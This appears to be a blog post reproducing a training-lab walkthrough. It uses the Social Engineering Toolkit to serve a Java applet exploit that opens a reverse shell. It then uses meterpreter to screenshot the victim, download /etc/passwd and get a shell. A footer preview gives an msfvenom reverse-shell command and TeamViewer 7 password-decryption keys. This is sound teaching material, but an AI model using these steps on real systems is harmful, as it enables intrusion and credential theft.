Skip to main content

Social Engineering Toolkit

 

Exploiting Java to Attack a Remote System

Using Social Engineering Toolkit (SET)

  1. Click on the Kali icon on the topology diagram.

image003.jpg

  1. If the VM window is black, simply click somewhere in the window.  For the Usernametype root.

Kali1.png

  1. When prompted for the passwordtype toorPress Enter.
Note: The password of toor will not be displayed when you type it for security purposes.

Kali2.png

  1. Open a new terminal window by clicking on the terminal icon located on the left menu pane.

Kali3.png

  1. Initiate the ifconfig command to verify if the loopback interface is up and running.

root@Kali-Attacker:~# ifconfig

image013.jpg

  1. If it is not active, initiate the command below to bring the loopback interface up.

root@Kali-Attacker:~# ifconfig lo up

image015.jpg

  1. Initiate the ifconfig command to verify if the loopback interface is up and running.

root@Kali-Attacker:~# ifconfig

image017.jpg

  1. Type the below command and press Enter to initialize the database for Metasploit.

root@Kali-Attacker:~# service postgresql start

 

  1. Start the Social Engineering Toolkit by typing the command below. Press Enter.

root@Kali-Attacker:~# setoolkit

image019.jpg

  1. Notice the random banner that appears at the top of the screen.
Note: your banner will most likely vary.

image011.png

  1. Hit Enter until you see a computer banner that says Free #hugs.  This might take a few times.

Note: when you hit Enter, it might not look like the banner changed.  Scroll up to see the new banner.

image012.png

  1. Notice the flag of 999818Click on the Challenge icon and type the flag number into the answer box. This is just to show you how to capture Challenge Flags you will see throughout this lab.

  1. Get the information for below Challenge Flag by using the same techniques from the previous steps.

  1. When presented with the SET main menutype 1 for Social-Engineering AttacksPress Enter.

image021.jpg

  1. On the next menu, type 2 for Website Attack VectorsPress Enter.

image023.jpg

  1. Choose the Metasploit Browser Exploit Method by typing the number 2Press Enter.

image025.jpg

  1. Choose Web Templates by typing 1Press Enter.

image027.jpg

  1. When asked, “Are you using NAT/Port Forwarding?” type yesPress Enter.

image029.jpg

  1. When prompted for an IP addresstype 203.0.113.2Press Enter.

image031.jpg

  1. When asked if the payload handler is on a different IP, type noPress Enter.

image033.jpg

  1. On the select template menutype 1 for Java RequiredPress Enter.

image035.jpg

  1. From the browser exploit listtype 12 to use the Java 7 Applet Remote Code ExecutionPress Enter.

image037.jpg

  1. Type 1 to use Windows Shell Reverse_TCPPress Enter.

image039.jpg

  1. Type 6666 to use as the reverse port numberPress Enter.

image041.jpg

  1. Allow 1 to 2 minutes to pass for the SET web server to start. Once the Server started message appears, press Enter.

image043_0.jpg

image045_0.jpg

Notice the prompt is set to msf exploit(java_jre17_exec). The Local IP presented is the malicious web URL we will want to send to the victim to initiate. Take note of this URL.

Initiating Malicious URL

  1. Click on the Ubuntu icon on the topology diagram.

image047.jpg

  1. On the login screenselect the student account.

image049_0.jpg

  1. When prompted for the passwordtype securepasswordPress Enter.
Note: The password of securepassword will not be displayed when you type it for security purposes.

image051_0.jpg

  1. Open the Firefox web browser by clicking on the Firefox icon located on the left menu pane.

image053.jpg

  1. In the address bartype the following: http://203.0.113.2:8080/ followed by pressing Enter.

image055.jpg

  1. message will appear asking to a Java appletClick on Allow.

image057.jpg

  1. Another Firefox message appears. Click on Allow Now.

image059.jpg

  1. Open a new terminal window by clicking on the terminal icon located on the left menu pane.

image061.jpg

  1. Type the command below and press Enter to verify if a connection has been made to the remote server.

student@Ubuntu:~$ netstat –nao | grep 6666

image063.jpg

Note the connection has been established.

Using The Meterpreter Session

  1. On Kali machinefocus on the terminal window left open with SET running. Notice the prompt displaying that a meterpreter session has been opened. Press Enter to bring the command prompt up.

image065.jpg

  1. Type sessions followed by pressing EnterNotice the active sessions presented.

image067.jpg

  1. Start an interaction with session 1Type the command below.

sessions –i 1

image069.jpg

  1. Press Enter.

image071.jpg

  1. Notice the meterpreter promptType sysinfo followed by pressing Enter to receive info on the OS of the victim.

image073.jpg

  1. Type getuid followed by pressing Enter to receive user info that the server is running as.

image075.jpg

  1. Type ps followed by pressing Enter to receive a list of running processes on the victim.

image077.jpg

  1. Type screenshot and press Enter to print an active screenshot of the victim’s current desktop screen.

image079.jpg

  1. Type download /etc/passwd and press Enter to grab the passwd file.

image081.jpg

  1. Type shell into the meterpreter prompt and press Enter.

image083.jpg

  1. Type pwd and press Enter to confirm we have shell access.

image085.jpg

  1. Type id student and press Enter to view the UID of 1000.

image046.png

  1. Get the information for below Challenge Flag by using the same techniques from the previous steps.

Comments

Post a Comment

Popular posts from this blog

All About SMB

The first step of enumerating networks is to identify common network services. These are Telnet, SMB and FTP. First step of enumeration is to conduct a port scan using nmap. A good tool to use to enumerate networks is enum4linux. What is SMB? SMB - Server Message Block Protocol - is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network. [ source ] Servers make file systems and other resources (printers, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers. The SMB protocol is known as a response-request protocol, meaning that it transmits multiple messages between the client and server to establish a connection. Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX. How does SMB work? Once they have establ...
Post a Comment
Read more

TeamViewer 7 Privilege Escalation

Hello! Today was a good day. I learned how to exploit a privesc vulnerability in TeamViewer (version 7) which had eluded me for quite some time due to a lack of user-friendly resources available online. But today I am changing all that ;) So basically, TeamViewer 7 stores user passwords encrypted with AES-128-CBC with a key of 0602000000a400005253413100040000 and iv of 0100010067244F436E6762F25EA8D704 in the Windows registry. This means that someone can decrypt that password using that key and iv and use it elsewhere if the user in question made repeated use of their password (as users often do!) Now, the process is doing this manually is complicated but luckily for us, a Metasploit module exists to automate this for us! First. generate a payload with msfvenom like so: $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip attacker> LPORT=4444 -f exe > revshell.exe Then move the payload to the machine with PowerShell (remember to move to the file to the ...
2 comments
Read more

Recursion

“So, what’s your number?” he asked me with innocent eyes, contemplating a number low enough to render me virtuous but high enough to guarantee some skill. In other words, n - 1.  I sighed and looked at ceiling. The scene was all too familiar. This time however, I wasn’t with a graduate student. Or an engineer. I was with a DJ.  “One time, I wrote a C program to remove the voice from a sound file,” I said shyly as he leaned in and grazed my earlobe.  Suddenly, he pulled back with disappointment.  “I’m really sorry, but I have to go to my show,” he said as he stuffed his headphones into his backpack. “I’ll see you later.”  The door slammed in the distance. I sighed and hung my head in shame. For I was embarking on the same destructive behavior, watching helplessly as my actions iterated miserably in a never-ending loop. Like recursion, a new romance temps with the promise of a memory address, such as the $user = “girlfriend” string as...
Post a Comment
Read more